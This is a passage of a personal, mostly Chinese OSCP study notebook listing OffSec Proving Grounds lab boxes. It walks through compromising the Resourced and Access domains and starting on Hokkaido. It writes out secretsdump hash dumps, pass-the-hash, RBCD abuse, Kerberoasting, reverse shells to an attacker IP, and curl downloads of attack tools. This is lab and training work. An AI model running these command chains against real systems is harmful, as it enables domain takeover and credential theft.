Lainkusanagi OSCP Like
| Linux | Windows | Windows Active Directory |
| ClamAV (Pwned) | Kevin (Pwned) | Access (Pwned) |
| Pelican (Pwned) | Internal (Pwned) | Resourced (Pwned) |
| Payday (Pwned) | Algernon (Pwned) | Nagoya |
| Snookums (Pwned) | Jacko (Pwned) | Hokkaido (Pwned) |
| Bratarina (Pwned) | Craft (Pwned) | Hutch (Pwned) |
| Pebbles (Pwned) | Squid (Pwned) | Vault (Pwned) |
| Nibbles (Pwned) | Nickel (Pwned) | |
| Hetemit (Pwned) | MedJed (Pwned) | |
| ZenPhoto (Pwned) | Billyboss(Pwned) | |
| Nukem (Pwned) | Shenzi (Pwned) | |
| Cockpit (Pwned) | AuthBy (Pwned) | |
| Clue (Pwned) | Slort (Pwned) | |
| Extplorer (Pwned) | Hepet (Pwned) | |
| Postfish (local) | DVR4 (Pwned) | |
| Hawat (Pwned) | Mice (Pwned) | |
| Walla (Pwned) | Monster (Pwned) | |
| PC (Pwned) | Fish (Pwned) | |
| Apex (Pwned) | ||
| Sorcerer (Pwned) | ||
| Sybaris (Pwned) | ||
| Peppo (Pwned) | ||
| Hunit (local) | ||
| Readys (Pwned) | ||
| Astronaut (Pwned) | ||
| Bullybox (Pwned) | ||
| Marketing (local) | ||
| Exfiltrated (Pwned) | ||
| Fanatastic (Pwned) | ||
| QuackerJack (Pwned) | ||
| Wombo (Pwned) | ||
| Flu (Pwned) | ||
| Roquefort (Pwned) | ||
| Levram (Pwned) | ||
| Mzeeav (Pwned) | ||
| LaVita (Pwned) | ||
| Xposedapi (Pwned) | ||
| Zipper (Pwned) | ||
| Ochima (Pwned) | ||
| Fired (Pwned) | ||
| Scrutiny (Pwned) | ||
| SPX(Pwned) | ||
| Vmdak (Pwned) | ||
| Mantis | ||
| BitForge (Pwned) | ||
| WallpaperHub | ||
| Zab |
NetSecFocus Trophy Room
| Linux Boxes: | Windows Boxes: | Windows Active Directory Boxes: |
| Twiggy (Pwned) | Helpdesk | Access (Pwned) |
| Exfiltrated (Pwned) | Algernon (Pwned) | Heist (Pwned) |
| Pelican (Pwned) | Authby (Pwned) | Vault (Pwned) |
| Astronaut (Pwned) | Craft (Pwned) | Nagoya |
| Blackgate (Pwned) | Hutch (Pwned) | Hokkaido (Pwned) |
| Boolean (Pwned) | Internal (Pwned) | Resourced (Pwned) |
| Clue (Pwned) | Jacko (Pwned) | Hutch (Pwned) |
| Cockpit (Pwned) | Kevin (Pwned) | |
| Codo (Pwned) | Resourced (Pwned) | |
| Crane (Pwned) | Squid (Pwned) | |
| Levram (Pwned) | DVR4 (Pwned) | |
| Extplore (Pwned) | Hepet (Pwned) | |
| Hub (Pwned) | Shenzi (Pwned) | |
| Image (Pwned) | Nickel (Pwned) | |
| law (Pwned) | Slort (Pwned) | |
| Lavita (Pwned) | MedJed (Pwned) | |
| PC (Pwned) | ||
| Fired (Pwned) | ||
| Press (Pwned) | ||
| Scrutiny (Pwned) | ||
| RubyDome (Pwned) | ||
| Zipper (Pwned) | ||
| Flu (Pwned) | ||
| Ochima (Pwned) | ||
| PyLoader (Pwned) | ||
| Plum (Pwned) | ||
| SPX (Pwned) | ||
| Jordak (Pwned) | ||
| BitForge(Pwned) | ||
| Vmdak (Pwned) |
Nagoya
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.134.21 | TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 |
Resourced
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.104.175 | TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 |
透過 enum4linux 找到 domain users ,並洩漏了 V.Ventz 密碼為 HotelCalifornia194!
======================================( Users on 192.168.104.175 )======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]SMB 有特別的資料夾 Password Audit ,其中裡面的 registry 資料夾內有 system & securiy,以及在 Active Directory 資料夾內有 ntds.dit
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ nxc smb '192.168.104.175' -u 'V.Ventz' -p 'HotelCalifornia194!' --shares
SMB 192.168.104.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.104.175 445 RESOURCEDC [+] resourced.local\V.Ventz:HotelCalifornia194!
SMB 192.168.104.175 445 RESOURCEDC [*] Enumerated shares
SMB 192.168.104.175 445 RESOURCEDC Share Permissions Remark
SMB 192.168.104.175 445 RESOURCEDC ----- ----------- ------
SMB 192.168.104.175 445 RESOURCEDC ADMIN$ Remote Admin
SMB 192.168.104.175 445 RESOURCEDC C$ Default share
SMB 192.168.104.175 445 RESOURCEDC IPC$ READ Remote IPC
SMB 192.168.104.175 445 RESOURCEDC NETLOGON READ Logon server share
SMB 192.168.104.175 445 RESOURCEDC Password Audit READ
SMB 192.168.104.175 445 RESOURCEDC SYSVOL READ Logon server share
---
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ smbclient //192.168.104.175/Password\ Audit -U V.Ventz
Password for [WORKGROUP\V.Ventz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
Active Directory D 0 Tue Oct 5 04:49:15 2021
registry D 0 Tue Oct 5 04:49:16 2021
c
7706623 blocks of size 4096. 2718634 blocks available
smb: \> cd registry
smb: \registry\> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
SECURITY A 65536 Mon Sep 27 06:45:20 2021
SYSTEM A 16777216 Mon Sep 27 06:45:20 2021
7706623 blocks of size 4096. 2718634 blocks available
smb: \registry\>
---
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ smbclient //192.168.104.175/Password\ Audit -U V.Ventz
Password for [WORKGROUP\V.Ventz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
Active Directory D 0 Tue Oct 5 04:49:15 2021
registry D 0 Tue Oct 5 04:49:16 2021
7706623 blocks of size 4096. 2718618 blocks available
smb: \> cd "Active Directory"
smb: \Active Directory\> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
ntds.dit A 25165824 Mon Sep 27 07:30:54 2021
ntds.jfm A 16384 Mon Sep 27 07:30:54 2021
7706623 blocks of size 4096. 2718570 blocks available
smb: \Active Directory\>使用 secretdump ,加上 nxc 去做 users 跟 hash 的 spray,最後只有一個新的 user L.Livingstone hash 是可用的
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
省略
---
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ nxc smb 192.168.104.175 -u users -H hashes --continue-on-success | grep +
SMB 192.168.104.175 445 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
SMB 192.168.104.175 445 RESOURCEDC [+] resourced.local\V.Ventz:913c144caea1c0a936fd1ccb46929d3cInitial Access
剛拿到的 L.Livingstone 用 winrm PtH 進去
Proof
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ evil-winrm -u 'L.Livingstone' -H '19a3a7550ce8c505c2d46b5e39d6f808' -i '192.168.104.175'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> cd ../../
*Evil-WinRM* PS C:\Users> tree /f /A
Folder PATH listing
Volume serial number is 5C30-DCD7
C:.
+---Administrator
+---L.Livingstone
| +---Desktop
| | local.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| +---Links
| +---Music
| +---Pictures
| +---Saved Games
| \---Videos
\---Public
*Evil-WinRM* PS C:\Users> Privilege Escalation – RBCD attack
對 DC 的 computer account 有 GenericAll,可以利用 Resource-Based Constrained Delegation。
先新增一個 computer account ATTACKERSYSTEM$ ,這裡使用 SAMR , LDAPS 有憑證問題
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-addcomputer -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host 192.168.182.175 -domain-netbios resourced 'resourced.local'/'L.Livingstone' -hashes ':19a3a7550ce8c505c2d46b5e39d6f808'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.設置 RBCD 委派權限,修改 computer account RESOURCEDC$ 的 msDS-AllowedToActOnBehalfOfOtherIdentity ,允許 ATTACKERSYSTEM$ 對RESOURCEDC$ 進行 kerberos 委派
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'RESOURCEDC$' -action 'write' 'resourced.local'/'L.Livingstone' -hashes ':19a3a7550ce8c505c2d46b5e39d6f808' -dc-ip 192.168.182.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-537427935-490066102-1511301751-4101)利用 RBCD 機制,生成一個偽裝 administrator 的 service ticket
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-getST -spn 'cifs/ResourceDC.resourced.local' -impersonate 'administrator' 'resourced.local/attackersystem$:Summer2018!' -dc-ip 192.168.182.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache匯入 serviec ticket,並設定 /etc/hosts 把 resourced.local ResourceDC.resourced.local 都指向 DC ip
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ export KRB5CCNAME=$(pwd)/'administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache'
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ klist
Ticket cache: FILE:/home/kali/oscp/pg/Resourced/administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache
Default principal: administrator@resourced.local
Valid starting Expires Service principal
07/12/2025 05:17:53 07/12/2025 15:17:52 cifs/ResourceDC.resourced.local@RESOURCED.LOCAL
renew until 07/13/2025 05:17:55
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-psexec resourced.local/administrator@ResourceDC.resourced.local -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file sgFVEzVn.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service Eqac on ResourceDC.resourced.local.....
[*] Starting service Eqac.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>Access
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.188.187 | TCP:53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,47001 |
Initial Access – file upload to rce
網站 Buy Now 按鈕點選後可以上傳檔案,並且會限制 php 副檔名,參考 https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt ,使用 .php……. ,繞過限制。
┌──(kali㉿kali)-[~/oscp/pg/Access]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 49854
cd ~
PS C:\Users\svc_apache> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\svc_apache>
目前拿到的 account svc_apache 權限還不夠拿到 local.txt ,用 bloodhound 分析查看 List all Kerberoastable Accounts 發現 svc_mssql 可以利用
查看系統所使用的 .NET Framework version
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version使用相對應的 Rubeus.exe 來 Kerberoasting
PS C:\Users\svc_apache> curl.exe 192.168.45.228:8000/Rubeus.exe -o Rubeus.exe
PS C:\Users\svc_apache> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\svc_apache\hashes.kerberoast
[*] Roasted hashes written to : C:\Users\svc_apache\hashes.kerberoast
PS C:\Users\svc_apache> type hashes.kerberoast
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$7D20B8C3CCC8CBF96B9A9C24E25B5D61$B9D56D5BE792350B928D7C28836B4F944968C9D79653B125F3F3C31EE6A42526CD08B5D5D5B6430D31F8326A58A747BDF9D5200CE5422ED77BC191119A3A4F791D590F2F81A177AB9E93376FBA2B6735BEC857FD295EB1EA2D66E8103473573EEBCB4D74E5B87D0A399B1F5F90D8DFF86C86579114E41B81F4BC6FFBA5BF0BE308501C4742D0D3C9068BFA71B6C41BBEA0829262B57A28F5B772D5AFE9CE43452E73347A87FD3435130DDAEC4E197E3B000C0689D3E3EBBAD19AC68F39A2B3756102176E6597514E64383931BC1327FE0E749015678D3CC117AF8C6F9EBA170EA0DD6D5B5F0521427B2BED1E64CA8532B0031697350ABD533DAF0E2725C7EAACAFA32598766D177BD3BF2E0AEF9FD4125756E3B35CF1E8C0323846F9EF1FB431995172DC22B696F3AA67B02FEF58CE06D9DBF87E4348920CC3C70440106A1274CC94958F1E6B6E2F17CA789CB830E2BBA392E79E3E8B067B853D4DFC66F6EDB717EBF0051CC87B918C7DB83E33AA7736C79409CE13B904EDC5840F8AEC4B856D6A74065F2EC45D7309186260709D89F7C1E13908873C93BBF4F82F89621FE2F643A339658B691E2EFE3ABE6923C771C2D9A52F8078E1A864E531649419B91383420E83B77C53378C2E00134F5FADF4496008EA4736C264CE67CCDAC83A3B8687816032B778E55B6A33B60927A8045E3365B9000599141DFE419C0A4BA095FC7E74DB3F228D7D5DE8986338D1663DC300A9204E9019FAF98F4BC692F8ECC1054C3E023D6D589287B1F9C4EDEFD7AD74E30BDEF1518AD577446B932026CD6F05B023EE68602E9BD40E86D90A8A9E23E0FF236CAD53A386CE05A06B376F79DEA4C7D8C20C62289A16A3AE9A6369440E58820F0581355822806A45F65B80EF6943A408F69709A767A403CE6DE0E297FA2E522F429BF6E90B606D656866E9E63E1934F6053827EE475DCF72CD2A8539BB15E45A0A94736FB23BA1425394F318A998B96F64A45ED75F45186E8AF836D93BD4BC4EBB4A8AB4F161BA528F94DDF8EF5339D084248A6A641CEAEA73D354DABC1120EA12C1356242824440AF86EA39D79AE66E64E6521D510B532460CAE78566FD35481E74870D697D37433843DBA076554278CA3FFBEE69638A6523FE6E31EAE6CE4FBF73669DF790D3EC7F3D21A4C5B284649FAFDBD76ACA371133D76D7B3857B5753AE5B83DF858E3FA543E4285ED8B5F038ACC9586BBEB2ECC0648CAD2A0FF2586A20CA4DEC0CABE301829593F80987153AA5A05E179DC07B833E70EF5527DDB0FFAA1B52F2B0B0FD6294BA09A71069A6721AC05B396258E991A1826BB08E2808F0B0CA5CE6225396BE98BA92D776D436D00E42D20DCCA81623E2DDE772CCC26275D5DCDBC8BD4B4F9346C776E1ED1F185F3110C9D6CA7B3B89624C8B43CCD60C5BB23C5474C360FA276A510EE58DB26FD3F373347B45F76F3AE694B411C2AFC152DC46C2A956AF806147D9AEF5F3F5EC19B0AB99E4B53C40A0AF06DEC458D4F9160C495851AD0A05ADB5B24ADD9928EA9E9727932D13A4C173B0F7CD753A669E42851E1EBD3F0464185160FCC1E0BEE141CCF184641E6EFF945517BE2E2BED8B452
PS C:\Users\svc_apache> 破解 hash 得到 svc_mssql 密碼為 trustno1 ,並使用 RunasCs.exe 已 svc_mssql 的身分跑一個 reverseshell
PS C:\Users\svc_apache> curl.exe 192.168.45.228:8000/RunasCs.exe -o RunasCs.exe
PS C:\Users\svc_apache> .\RunasCs.exe
[-] Not enough arguments. 3 Arguments required. Use --help for additional help.
PS C:\Users\svc_apache> .\RunasCs.exe svc_mssql trustno1 cmd -r 192.168.45.228:8787
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-45f4f$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 1216 created in background.
PS C:\Users\svc_apache> Proof
┌──(kali㉿kali)-[~/oscp/pg/Access]
└─$ rlwrap nc -lvnp 8787
listening on [any] 8787 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 50076
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
C:\Windows\system32>type c:\users\svc_mssql\desktop\local.txt
type c:\users\svc_mssql\desktop\local.txt
3a7f47eb0838c8ddfdc5339eade9cb53Privilege Escalation – SeManageVolumePrivilege
利用 SeManageVolumePrivilege 權限 ,使用 SeManageVolumeExploit.exe ,搭配 這篇 說明 ,先執行 exe ,有權限在 C:\Windows\System32\wbem> 新增 tzres.dll ,其中 tzres.dll 是用 msfvenom 生成的 revshell dll
C:\Windows\Temp>curl.exe 192.168.45.228:8000/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe
curl.exe 192.168.45.228:8000/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 12288 100 12288 0 0 74539 0 --:--:-- --:--:-- --:--:-- 75851
C:\Windows\Temp>.\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 918
DONE
C:\Windows\Temp>cd C:\Windows\System32\wbem\
cd C:\Windows\System32\wbem\
PS C:\Windows\System32\wbem> curl.exe 192.168.45.228:8000/tzres.dll -o tzres.dll
curl.exe 192.168.45.228:8000/tzres.dll -o tzres.dll
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 9216 100 9216 0 0 59921 0 --:--:-- --:--:-- --:--:-- 60235
PS C:\Windows\System32\wbem> systeminfo
systeminfo
ERROR: The remote procedure call failed.
PS C:\Windows\System32\wbem> Proof
──(kali㉿kali)-[~/oscp/pg/Access]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 50285
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
C:\Windows\system32>type c:\users\administrator\desktop\proof.txt
type c:\users\administrator\desktop\proof.txt
6c199b9598708291f3d96acaf7de1a60
C:\Windows\system32>
hokkaido
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.217.40 | TCP:53,80,88,135,139,389,445464,593,636,1433,3268,3269,3389,5985,8530,8531,9389,47001 |
SMB enumeration
使用假定外洩給的帳號 info/info ,其中在 NETLOGON/temp 底下有一個 password_reset.txt 發現密碼 Start123!
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ smbclient //192.168.217.40/NETLOGON -U info
Password for [WORKGROUP\info]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 25 08:40:08 2023
.. D 0 Sat Nov 25 08:17:33 2023
temp D 0 Wed Dec 6 10:44:26 2023
7699711 blocks of size 4096. 1920233 blocks available
smb: \> cd temp
smb: \temp\> ls
. D 0 Wed Dec 6 10:44:26 2023
.. D 0 Sat Nov 25 08:40:08 2023
password_reset.txt A 27 Sat Nov 25 08:40:29 2023
m
7699711 blocks of size 4096. 1920233 blocks available
smb: \temp\> more password_reset.txt
---
Initial Password: Start123!
/tmp/smbmore.nhOD14 (END)使用 nxc 收集 domain 上的 users,並且 password spraying 找到 discovery:Start123!
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc smb 192.168.217.40 -u info -p info --users-export users
SMB 192.168.217.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.217.40 445 DC [+] hokkaido-aerospace.com\info:info
SMB 192.168.217.40 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.217.40 445 DC Administrator 2023-12-06 15:56:28 0 Built-in account for administering the computer/domain
SMB 192.168.217.40 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.217.40 445 DC krbtgt 2023-11-25 13:11:55 0 Key Distribution Center Service Account
SMB 192.168.217.40 445 DC Hazel.Green 2023-12-06 16:34:46 0
SMB 192.168.217.40 445 DC Molly.Smith 2023-11-25 13:34:13 0
SMB 192.168.217.40 445 DC Alexandra.Little 2023-11-25 13:34:13 0
SMB 192.168.217.40 445 DC Victor.Kelly 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Catherine.Knight 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Angela.Davies 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Molly.Edwards 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Tracy.Wood 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Lynne.Tyler 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Charlene.Wallace 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Cheryl.Singh 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Sian.Gordon 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Gordon.Brown 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Irene.Dean 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Anthony.Anderson 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Julian.Davies 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Hannah.O'Neill 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Rachel.Jones 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Declan.Woodward 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Annette.Buckley 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Elliott.Jones 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Grace.Lees 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Deborah.Francis 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Bruce.Cartwright 2023-11-25 13:34:21 0
SMB 192.168.217.40 445 DC Nigel.Brown 2023-11-25 13:34:21 0
SMB 192.168.217.40 445 DC Derek.Wyatt 2023-11-25 13:34:21 0
SMB 192.168.217.40 445 DC discovery 2023-12-06 15:42:56 0
SMB 192.168.217.40 445 DC maintenance 2023-11-25 13:39:04 0
SMB 192.168.217.40 445 DC hrapp-service 2023-11-25 14:14:40 0
SMB 192.168.217.40 445 DC info 2023-12-06 15:43:50 0
SMB 192.168.217.40 445 DC [*] Enumerated 33 local users: HAERO
SMB 192.168.217.40 445 DC [*] Writing 33 local users to users┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc smb 192.168.217.40 -u users -p Start123! | grep +
SMB 192.168.217.40 445 DC [+] hokkaido-aerospace.com\discovery:Start123! Initial Access
在bloodhound 中可以看到剛剛拿到的 account DISCOVERY@HOKKAIDO-AEROSPACE.COM 是 service group 的一部分
嘗試使用 mssql ,發現這組這號可以使用該服務
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!'
MSSQL 192.168.217.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.217.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
登入後發現沒有權限讀取其他資料庫,也沒辦法執行 shell 等等。用 nxc 檢查發現可以 impersonate 的用戶,並取得一組 credential
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!' -M mssql_priv
MSSQL 192.168.217.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
